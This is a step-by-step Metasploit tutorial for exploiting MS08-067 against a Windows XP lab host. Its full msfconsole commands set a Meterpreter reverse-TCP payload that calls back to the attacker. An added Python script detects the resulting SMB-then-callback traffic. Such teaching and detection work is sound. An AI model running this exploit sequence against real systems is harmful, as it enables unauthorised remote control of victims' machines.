Exploiting the MS08-067 vulnerability with Metasploit

Exploiting the MS08-067 vulnerability

  • 1. Open a terminal
  • 2. Open the msf console

    msfconsole
    

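    Sometimes a prompt reports that a database has not been started. Run the command shown in the dialog to start the required database first, then continue.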

  • 3. Find the exploit module

    msf > search 08_067
    
    Matching Modules
    ================
    
     Name                                 Disclosure Date  Rank   Description
     ----                                 ---------------  ----   -----------
     exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
    
  • 4. Use the module

    msf > use exploit/windows/smb/ms08_067_netapi
    

    After this, the msf prompt changes to:

    msf exploit(ms08_067_netapi) >
    
  • 5. See which options need to be configured

    msf exploit(ms08_067_netapi) > show options
    
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST                     yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting

  • 6. Set the target machine's IP

    msf exploit(ms08_067_netapi) > set RHOST 192.168.43.176
    
    RHOST => 192.168.43.176
    

    Check the configuration again

    msf exploit(ms08_067_netapi) > show options
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    192.168.43.176   yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting

  • 7. List the payloads

    msf exploit(ms08_067_netapi) > show payloads
    
    Compatible Payloads
    ===================
    
      Name                                                Disclosure Date  Rank    Description
      ----                                                ---------------  ----    -----------
      generic/custom                                                       normal  Custom Payload
      generic/debug_trap                                                   normal  Generic x86 Debug Trap
      generic/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP Inline
      generic/shell_reverse_tcp                                            normal  Generic Command Shell, Reverse TCP Inline
      generic/tight_loop                                                   normal  Generic x86 Tight Loop
      windows/adduser                                                      normal  Windows Execute net user /ADD
      windows/dllinject/bind_hidden_ipknock_tcp                            normal  Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
      windows/dllinject/bind_hidden_tcp                                    normal  Reflective DLL Injection, Hidden Bind TCP Stager
      windows/dllinject/bind_ipv6_tcp                                      normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
      windows/dllinject/bind_ipv6_tcp_uuid                                 normal  Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
      windows/dllinject/bind_nonx_tcp                                      normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
      windows/dllinject/bind_tcp                                           normal  Reflective DLL Injection, Bind TCP Stager (Windows x86)
      windows/dllinject/bind_tcp_rc4                                       normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
      windows/dllinject/bind_tcp_uuid                                      normal  Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
      windows/dllinject/reverse_hop_http                                   normal  Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
      windows/dllinject/reverse_http                                       normal  Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
      windows/dllinject/reverse_ipv6_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
      windows/dllinject/reverse_nonx_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
      windows/dllinject/reverse_ord_tcp                                    normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
      windows/dllinject/reverse_tcp                                        normal  Reflective DLL Injection, Reverse TCP Stager
      windows/dllinject/reverse_tcp_allports                               normal  Reflective DLL Injection, Reverse All-Port TCP Stager
      windows/dllinject/reverse_tcp_dns                                    normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
      windows/dllinject/reverse_tcp_rc4                                    normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
      windows/dllinject/reverse_tcp_uuid                                   normal  Reflective DLL Injection, Reverse TCP Stager with UUID Support
      windows/dllinject/reverse_winhttp                                    normal  Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
      windows/dns_txt_query_exec                                           normal  DNS TXT Record Payload Download and Execution
      windows/exec                                                         normal  Windows Execute Command
      windows/format_all_drives                                            manual  Windows Drive Formatter
      windows/loadlibrary                                                  normal  Windows LoadLibrary Path
      windows/messagebox                                                   normal  Windows MessageBox
      windows/meterpreter/bind_hidden_ipknock_tcp                          normal  Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
      windows/meterpreter/bind_hidden_tcp                                  normal  Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
      windows/meterpreter/bind_ipv6_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
      windows/meterpreter/bind_ipv6_tcp_uuid                               normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
      windows/meterpreter/bind_nonx_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
      windows/meterpreter/bind_tcp                                         normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
      windows/meterpreter/bind_tcp_rc4                                     normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
      windows/meterpreter/bind_tcp_uuid                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
      windows/meterpreter/reverse_hop_http                                 normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
      windows/meterpreter/reverse_http                                     normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
      windows/meterpreter/reverse_https                                    normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
      windows/meterpreter/reverse_https_proxy                              normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
      windows/meterpreter/reverse_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
      windows/meterpreter/reverse_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
      windows/meterpreter/reverse_ord_tcp                                  normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
      windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
      windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
      windows/meterpreter/reverse_tcp_dns                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
      windows/meterpreter/reverse_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
      windows/meterpreter/reverse_tcp_uuid                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
      windows/meterpreter/reverse_winhttp                                  normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
      windows/meterpreter/reverse_winhttps                                 normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
      windows/metsvc_bind_tcp                                              normal  Windows Meterpreter Service, Bind TCP
      windows/metsvc_reverse_tcp                                           normal  Windows Meterpreter Service, Reverse TCP Inline
      windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  Windows Inject DLL, Hidden Bind Ipknock TCP Stager
      windows/patchupdllinject/bind_hidden_tcp                             normal  Windows Inject DLL, Hidden Bind TCP Stager
      windows/patchupdllinject/bind_ipv6_tcp                               normal  Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
      windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
      windows/patchupdllinject/bind_nonx_tcp                               normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
      windows/patchupdllinject/bind_tcp                                    normal  Windows Inject DLL, Bind TCP Stager (Windows x86)
      windows/patchupdllinject/bind_tcp_rc4                                normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption)
      windows/patchupdllinject/bind_tcp_uuid                               normal  Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
      windows/patchupdllinject/reverse_ipv6_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
      windows/patchupdllinject/reverse_nonx_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
      windows/patchupdllinject/reverse_ord_tcp                             normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
      windows/patchupdllinject/reverse_tcp                                 normal  Windows Inject DLL, Reverse TCP Stager
      windows/patchupdllinject/reverse_tcp_allports                        normal  Windows Inject DLL, Reverse All-Port TCP Stager
      windows/patchupdllinject/reverse_tcp_dns                             normal  Windows Inject DLL, Reverse TCP Stager (DNS)
      windows/patchupdllinject/reverse_tcp_rc4                             normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption)
      windows/patchupdllinject/reverse_tcp_uuid                            normal  Windows Inject DLL, Reverse TCP Stager with UUID Support
      windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
      windows/patchupmeterpreter/bind_hidden_tcp                           normal  Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
      windows/patchupmeterpreter/bind_ipv6_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
      windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
      windows/patchupmeterpreter/bind_nonx_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
      windows/patchupmeterpreter/bind_tcp                                  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
      windows/patchupmeterpreter/bind_tcp_rc4                              normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption)
      windows/patchupmeterpreter/bind_tcp_uuid                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
      windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
      windows/patchupmeterpreter/reverse_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
      windows/patchupmeterpreter/reverse_ord_tcp                           normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
      windows/patchupmeterpreter/reverse_tcp                               normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
      windows/patchupmeterpreter/reverse_tcp_allports                      normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
      windows/patchupmeterpreter/reverse_tcp_dns                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
      windows/patchupmeterpreter/reverse_tcp_rc4                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption)
      windows/patchupmeterpreter/reverse_tcp_uuid                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
      windows/shell/bind_hidden_ipknock_tcp                                normal  Windows Command Shell, Hidden Bind Ipknock TCP Stager
      windows/shell/bind_hidden_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Stager
      windows/shell/bind_ipv6_tcp                                          normal  Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
      windows/shell/bind_ipv6_tcp_uuid                                     normal  Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
      windows/shell/bind_nonx_tcp                                          normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
      windows/shell/bind_tcp                                               normal  Windows Command Shell, Bind TCP Stager (Windows x86)
      windows/shell/bind_tcp_rc4                                           normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption)
      windows/shell/bind_tcp_uuid                                          normal  Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
      windows/shell/reverse_ipv6_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (IPv6)
      windows/shell/reverse_nonx_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
      windows/shell/reverse_ord_tcp                                        normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
      windows/shell/reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Stager
      windows/shell/reverse_tcp_allports                                   normal  Windows Command Shell, Reverse All-Port TCP Stager
      windows/shell/reverse_tcp_dns                                        normal  Windows Command Shell, Reverse TCP Stager (DNS)
      windows/shell/reverse_tcp_rc4                                        normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption)
      windows/shell/reverse_tcp_uuid                                       normal  Windows Command Shell, Reverse TCP Stager with UUID Support
      windows/shell_bind_tcp                                               normal  Windows Command Shell, Bind TCP Inline
      windows/shell_hidden_bind_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Inline
      windows/shell_reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Inline
      windows/speak_pwned                                                  normal  Windows Speech API - Say "You Got Pwned!"
      windows/upexec/bind_hidden_ipknock_tcp                               normal  Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
      windows/upexec/bind_hidden_tcp                                       normal  Windows Upload/Execute, Hidden Bind TCP Stager
      windows/upexec/bind_ipv6_tcp                                         normal  Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
      windows/upexec/bind_ipv6_tcp_uuid                                    normal  Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
      windows/upexec/bind_nonx_tcp                                         normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
      windows/upexec/bind_tcp                                              normal  Windows Upload/Execute, Bind TCP Stager (Windows x86)
      windows/upexec/bind_tcp_rc4                                          normal  Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption)
      windows/upexec/bind_tcp_uuid                                         normal  Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
      windows/upexec/reverse_ipv6_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
      windows/upexec/reverse_nonx_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
      windows/upexec/reverse_ord_tcp                                       normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
      windows/upexec/reverse_tcp                                           normal  Windows Upload/Execute, Reverse TCP Stager
      windows/upexec/reverse_tcp_allports                                  normal  Windows Upload/Execute, Reverse All-Port TCP Stager
      windows/upexec/reverse_tcp_dns                                       normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
      windows/upexec/reverse_tcp_rc4                                       normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption)
      windows/upexec/reverse_tcp_uuid                                      normal  Windows Upload/Execute, Reverse TCP Stager with UUID Support
      windows/vncinject/bind_hidden_ipknock_tcp                            normal  VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
      windows/vncinject/bind_hidden_tcp                                    normal  VNC Server (Reflective Injection), Hidden Bind TCP Stager
      windows/vncinject/bind_ipv6_tcp                                      normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
      windows/vncinject/bind_ipv6_tcp_uuid                                 normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
      windows/vncinject/bind_nonx_tcp                                      normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
      windows/vncinject/bind_tcp                                           normal  VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
      windows/vncinject/bind_tcp_rc4                                       normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
      windows/vncinject/bind_tcp_uuid                                      normal  VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
      windows/vncinject/reverse_hop_http                                   normal  VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
      windows/vncinject/reverse_http                                       normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
      windows/vncinject/reverse_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
      windows/vncinject/reverse_nonx_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
      windows/vncinject/reverse_ord_tcp                                    normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
      windows/vncinject/reverse_tcp                                        normal  VNC Server (Reflective Injection), Reverse TCP Stager
      windows/vncinject/reverse_tcp_allports                               normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
      windows/vncinject/reverse_tcp_dns                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
      windows/vncinject/reverse_tcp_rc4                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
      windows/vncinject/reverse_tcp_uuid                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
      windows/vncinject/reverse_winhttp                                    normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
    
  • 8. Set the payload

    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
    
    payload => windows/meterpreter/reverse_tcp
    

    Either memorize this payload name or remember what it is; being able to find it in the list also works.

  • 9. Set the local IP address

    msf exploit(ms08_067_netapi) > set LHOST 192.168.43.236
    
    LHOST => 192.168.43.236
    

    Check the configuration

    msf exploit(ms08_067_netapi) > show options
    
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    192.168.43.176   yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.43.236   yes       The listen address
       LPORT     4444             yes       The listen port
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting

  • 10. View and set the target version ID

    msf exploit(ms08_067_netapi) > show targets
    
    Exploit targets:
    
       Id  Name
       --  ----
       0   Automatic Targeting
       1   Windows 2000 Universal
       2   Windows XP SP0/SP1 Universal
       3   Windows 2003 SP0 Universal
       4   Windows XP SP2 English (AlwaysOn NX)
       5   Windows XP SP2 English (NX)
       6   Windows XP SP3 English (AlwaysOn NX)
       7   Windows XP SP3 English (NX)
       8   Windows XP SP2 Arabic (NX)
       9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
       10  Windows XP SP2 Chinese - Simplified (NX)
       11  Windows XP SP2 Chinese - Traditional (NX)
       12  Windows XP SP2 Czech (NX)
       13  Windows XP SP2 Danish (NX)
       14  Windows XP SP2 German (NX)
       15  Windows XP SP2 Greek (NX)
       16  Windows XP SP2 Spanish (NX)
       17  Windows XP SP2 Finnish (NX)
       18  Windows XP SP2 French (NX)
       19  Windows XP SP2 Hebrew (NX)
       20  Windows XP SP2 Hungarian (NX)
       21  Windows XP SP2 Italian (NX)
       22  Windows XP SP2 Japanese (NX)
       23  Windows XP SP2 Korean (NX)
       24  Windows XP SP2 Dutch (NX)
       25  Windows XP SP2 Norwegian (NX)
       26  Windows XP SP2 Polish (NX)
       27  Windows XP SP2 Portuguese - Brazilian (NX)
       28  Windows XP SP2 Portuguese (NX)
       29  Windows XP SP2 Russian (NX)
       30  Windows XP SP2 Swedish (NX)
       31  Windows XP SP2 Turkish (NX)
       32  Windows XP SP3 Arabic (NX)
       33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
       34  Windows XP SP3 Chinese - Simplified (NX)
       35  Windows XP SP3 Chinese - Traditional (NX)
       36  Windows XP SP3 Czech (NX)
       37  Windows XP SP3 Danish (NX)
       38  Windows XP SP3 German (NX)
       39  Windows XP SP3 Greek (NX)
       40  Windows XP SP3 Spanish (NX)
       41  Windows XP SP3 Finnish (NX)
       42  Windows XP SP3 French (NX)
       43  Windows XP SP3 Hebrew (NX)
       44  Windows XP SP3 Hungarian (NX)
       45  Windows XP SP3 Italian (NX)
       46  Windows XP SP3 Japanese (NX)
       47  Windows XP SP3 Korean (NX)
       48  Windows XP SP3 Dutch (NX)
       49  Windows XP SP3 Norwegian (NX)
       50  Windows XP SP3 Polish (NX)
       51  Windows XP SP3 Portuguese - Brazilian (NX)
       52  Windows XP SP3 Portuguese (NX)
       53  Windows XP SP3 Russian (NX)
       54  Windows XP SP3 Swedish (NX)
       55  Windows XP SP3 Turkish (NX)
       56  Windows 2003 SP1 English (NO NX)
       57  Windows 2003 SP1 English (NX)
       58  Windows 2003 SP1 Japanese (NO NX)
       59  Windows 2003 SP1 Spanish (NO NX)
       60  Windows 2003 SP1 Spanish (NX)
       61  Windows 2003 SP1 French (NO NX)
       62  Windows 2003 SP1 French (NX)
       63  Windows 2003 SP2 English (NO NX)
       64  Windows 2003 SP2 English (NX)
       65  Windows 2003 SP2 German (NO NX)
       66  Windows 2003 SP2 German (NX)
       67  Windows 2003 SP2 Portuguese - Brazilian (NX)
       68  Windows 2003 SP2 Spanish (NO NX)
       69  Windows 2003 SP2 Spanish (NX)
       70  Windows 2003 SP2 Japanese (NO NX)
       71  Windows 2003 SP2 French (NO NX)
       72  Windows 2003 SP2 French (NX)
    

    Set the target ID

    msf exploit(ms08_067_netapi) > set target 11
    
    target => 11

  • 11. Confirm once more that the configuration is complete

    msf exploit(ms08_067_netapi) > show options
    
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    192.168.43.176   yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    Payload options (windows/meterpreter/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.43.236   yes       The listen address
       LPORT     4444             yes       The listen port
    
    Exploit target:
    
       Id  Name
       --  ----
       11  Windows XP SP2 Chinese - Traditional (NX)

  • 12. Launch the attack

    msf exploit(ms08_067_netapi) > exploit
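
Seen from the network, the configuration above has a recognisable shape: an inbound connection to TCP 445 on the target, followed within seconds by the target connecting back to the listen address (port 4444 in the options shown). The following is an added example, not part of the original post, that flags that sequence in flow logs; the log format, the field names, the 60-second window and the sample lines are all constructed assumptions.

```python
"""Flag hosts that accept an SMB connection and then connect back to the same peer.

Added example: the flow-log format and the sample records are constructed.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

SMB_PORT = 445                    # RPORT shown in the module options
WATCHED_CALLBACK_PORTS = {4444}   # LPORT shown in the payload options
WINDOW = timedelta(seconds=60)    # assumed correlation window

# Constructed records: "timestamp src_ip src_port dst_ip dst_port proto"
SAMPLE_LOG = """\
2024-01-10T09:00:01 192.168.43.236 51522 192.168.43.176 445 tcp
2024-01-10T09:00:03 192.168.43.176 1041 192.168.43.236 4444 tcp
2024-01-10T09:05:00 192.168.43.50 50211 192.168.43.176 445 tcp
2024-01-10T09:05:02 192.168.43.176 1042 192.168.43.10 80 tcp
2024-01-10T09:30:00 192.168.43.60 50300 192.168.43.177 445 tcp
2024-01-10T09:40:00 192.168.43.177 1050 192.168.43.60 4444 tcp
malformed line here
"""


@dataclass(frozen=True)
class Flow:
    ts: datetime
    src: str
    sport: int
    dst: str
    dport: int


@dataclass(frozen=True)
class Alert:
    host: str            # machine that accepted SMB and then called back
    peer: str            # machine that opened the SMB connection
    callback_port: int
    delay_s: float       # seconds between the SMB connection and the callback
    default_port: bool   # True when the callback port is in WATCHED_CALLBACK_PORTS


def parse_flows(text):
    """Parse flow records, skipping malformed lines, and return them in time order."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6 or parts[5] != "tcp":
            continue
        try:
            flows.append(Flow(datetime.fromisoformat(parts[0]), parts[1],
                              int(parts[2]), parts[3], int(parts[4])))
        except ValueError:
            continue
    return sorted(flows, key=lambda f: f.ts)


def find_smb_callbacks(flows, window=WINDOW):
    """Return an Alert for each connection a host makes back to a recent SMB client."""
    last_smb = {}   # (server, client) -> time of the most recent inbound 445
    alerts = []
    for f in flows:
        if f.dport == SMB_PORT:
            last_smb[(f.dst, f.src)] = f.ts
            continue
        seen = last_smb.get((f.src, f.dst))
        if seen is not None and f.ts - seen <= window:
            alerts.append(Alert(f.src, f.dst, f.dport,
                                (f.ts - seen).total_seconds(),
                                f.dport in WATCHED_CALLBACK_PORTS))
    return alerts


if __name__ == "__main__":
    for alert in find_smb_callbacks(parse_flows(SAMPLE_LOG)):
        print(alert)
```

Only the reverse_tcp case configured in this walkthrough produces this pattern; a bind-style payload does not connect back, so it needs a separate check for unexpected new listeners on the target.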
    